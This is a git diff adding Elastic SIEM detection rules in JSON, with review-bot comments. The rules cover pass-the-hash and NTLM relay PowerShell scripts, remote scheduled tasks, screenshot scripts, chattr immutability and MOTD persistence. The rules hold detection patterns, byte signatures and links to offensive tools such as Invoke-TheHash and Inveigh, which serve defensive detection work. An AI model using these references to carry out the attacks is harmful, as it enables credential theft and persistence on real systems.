diff --git a/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json b/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json new file mode 100644 index 00000000000..89b38e7a087 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json 
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can execute pass-the-hash (PtH) attacks, intercept and relay NTLM challenges, and carry out other man-in-the-middle (MitM) attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell Pass-the-Hash/Relay Script", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"NTLMSSPNegotiate\" and (\"NegotiateSMB\" or \"NegotiateSMB2\")) or\n \"4E544C4D53535000\" or\n \"0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50\" or\n \"0x4e,0x54,0x20,0x4c,0x4d\" or\n \"0x53,0x4d,0x42,0x20,0x32\" or\n \"0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38\"\n )\n", + "references": [ + "https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1", + "https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1", + "https://github.com/dafthack/Check-LocalAdminHash/blob/master/Check-LocalAdminHash.ps1", + "https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-Tater.ps1", + "https://github.com/Kevin-Robertson/Inveigh/blob/master/Inveigh.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "951779c2-82ad-4a6c-82b8-296c1f691449", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script 
Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "951779c2-82ad-4a6c-82b8-296c1f691449_1", + "type": "security-rule" +} \ No newline at end of file 
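Review bot: The `tags` array includes `"Resources: Investigation Guide"` but the rule has no `note` field, so the tag advertises a triage guide that does not exist (compare 959a7353 in this commit, which carries both the tag and the guide). Either drop the tag or add a `note` with the usual Triage and analysis / False positive analysis / Response and remediation sections, and use the FP section to say that the byte patterns in the query (`4E544C4D53535000` is the NTLMSSP signature) may also appear in scripts that bundle legitimate NTLM client libraries, so a hit needs script-content review rather than automatic escalation.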
diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json new file mode 100644 index 00000000000..4875d380856 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote scheduled task creations on a target host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Scheduled Task Creation", + "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. 
Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "954ee7c8-5437-49ae-b2d6-2960883898e9", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "954ee7c8-5437-49ae-b2d6-2960883898e9_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json new file mode 100644 index 00000000000..60ad3ac18fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can take screenshots, which is a common feature in post-exploitation kits and remote access tools (RATs).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Screenshot Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, which makes it available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course of an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": 
"Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1113", + "name": "Screen Capture", + "reference": "https://attack.mitre.org/techniques/T1113/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "959a7353-1129-4aa7-9084-30746b256a70_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json new file mode 100644 index 00000000000..ef0c1868905 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.).", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "File made Immutable by Chattr", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.id == \"0\" and\n process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and\n not process.parent.executable: (\"/lib/systemd/systemd\", \"/usr/local/uems_agent/bin/*\", \"/usr/lib/systemd/systemd\") and\n not process.parent.name in (\"systemd\", \"cf-agent\", \"ntpdate\", \"xargs\", \"px\", \"preinst\", \"auth\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- 
Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.002", + "name": "Linux and Mac File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "968ccab9-da51-4a87-9ce2-d3c9782fd759_111", + 
"type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json new file mode 100644 index 00000000000..8e88cf1e2ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the \"/etc/update-motd.d/\" and \"/usr/lib/update-notifier/\" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through MOTD File Creation Detected", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type :linux and event.action:(creation or file_create_event or rename or file_rename_event) and\nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf or podman or ln or yum \n) and not (\n (process.name:mv and file.extension:dpkg-remove) or\n (file.extension:(swp or swpx))\n)\n", + "references": [ + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "96d11d31-9a79-480f-8401-da28b194608f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "96d11d31-9a79-480f-8401-da28b194608f_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json new file mode 100644 index 00000000000..dd24f7afa2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json 
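Review bot: The exclusion clause in `query` keys only on `process.name` (`dpkg`, `dockerd`, `rpm`, `executor`, `dnf`, `podman`, `ln`, `yum`), so the alert is suppressed for any process carrying one of those names regardless of where its executable lives, which is a weak allow-list for a root-executed persistence location. Since `process.executable` is already one of the `new_terms_fields`, the package-manager exclusions could be anchored to full executable paths instead of bare names, e.g. `not process.executable : (<constructed: /usr/bin/dpkg-style path list>)`. The `setup` text links `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html` while the sibling rule 96e90768 in this same commit links the `current` version of that page; the pinned 8.10 link will go stale and should match. It would also help triagers if `note` stated that, as a `new_terms` rule with `history_window_start: now-10d`, repeated creations of an already-seen host/path/executable combination are not expected to re-alert.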
